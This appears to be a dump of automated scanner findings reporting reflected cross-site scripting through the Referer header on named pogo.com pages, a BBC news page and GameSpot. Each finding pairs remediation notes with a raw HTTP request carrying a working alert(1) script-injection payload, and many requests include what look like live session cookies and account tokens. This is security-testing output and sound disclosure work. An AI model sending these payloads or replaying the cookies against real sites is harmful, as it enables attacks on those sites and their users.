The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d25a</script><script>alert(1)</script>e015009fb05 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/util/urlopen.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=4d25a</script><script>alert(1)</script>e015009fb05
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c14fe</script><script>alert(1)</script>03c013b122e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /util/client-props.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=c14fe</script><script>alert(1)</script>03c013b122e
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a972b</script><script>alert(1)</script>84069feffea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v/11.1.9.13/applet/scrabble/ HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=a972b</script><script>alert(1)</script>84069feffea
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10ba1</script><script>alert(1)</script>022d3a73fd9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v/11.1.9.44/applet/jvmtest/ HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=10ba1</script><script>alert(1)</script>022d3a73fd9
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7208c</script><script>alert(1)</script>8221f99fc9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7208c</script><script>alert(1)</script>8221f99fc9b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4af4</script><script>alert(1)</script>32744a0a28b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/bejeweled2 HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e4af4</script><script>alert(1)</script>32744a0a28b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb427</script><script>alert(1)</script>cea094aa600 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rss HTTP/1.1
Host: rss.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bb427</script><script>alert(1)</script>cea094aa600
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538ca</script><script>alert(1)</script>81af36a11a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?pageSection=footer_word HTTP/1.1
Host: word-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=538ca</script><script>alert(1)</script>81af36a11a3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e47</script><script>alert(1)</script>9e203e837be was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/scrabble HTTP/1.1
Host: word-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=68e47</script><script>alert(1)</script>9e203e837be
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9960f</script><script>alert(1)</script>42aee4319cf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble HTTP/1.1
Host: word-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9960f</script><script>alert(1)</script>42aee4319cf
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c325'-alert(1)-'53bf3b90fb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/technology-12126880 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6c325'-alert(1)-'53bf3b90fb1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db8c"><a>32f7510c149 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.gamespot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 3db8c"><a>32f7510c149
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7731c</script><script>alert(1)</script>e18aafb3c6f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=7731c</script><script>alert(1)</script>e18aafb3c6f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536387265-New%7C1297128387265%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f55a</script><script>alert(1)</script>4d32471be0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=7f55a</script><script>alert(1)</script>4d32471be0f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc5f7</script><script>alert(1)</script>82ec750f525 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/my-account.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=bc5f7</script><script>alert(1)</script>82ec750f525
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536393024-New%7C1297128393024%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 990a5</script><script>alert(1)</script>ea916518bb7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/my-account/confirm-recover-password.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=990a5</script><script>alert(1)</script>ea916518bb7
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536429883-New%7C1297128429883%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e38fd</script><script>alert(1)</script>a0087aca4a3311088 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e862</script><script>alert(1)</script>4b4db4ca10a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/my-account/edit-checkout-settings.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=4e862</script><script>alert(1)</script>4b4db4ca10a
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536480861-New%7C1297128480861%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62c90</script><script>alert(1)</script>b96d37eb0ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/my-account/main.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=62c90</script><script>alert(1)</script>b96d37eb0ff
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536471206-New%7C1297128471206%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f349d</script><script>alert(1)</script>417f6300586 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/my-account/recover.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f349d</script><script>alert(1)</script>417f6300586
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
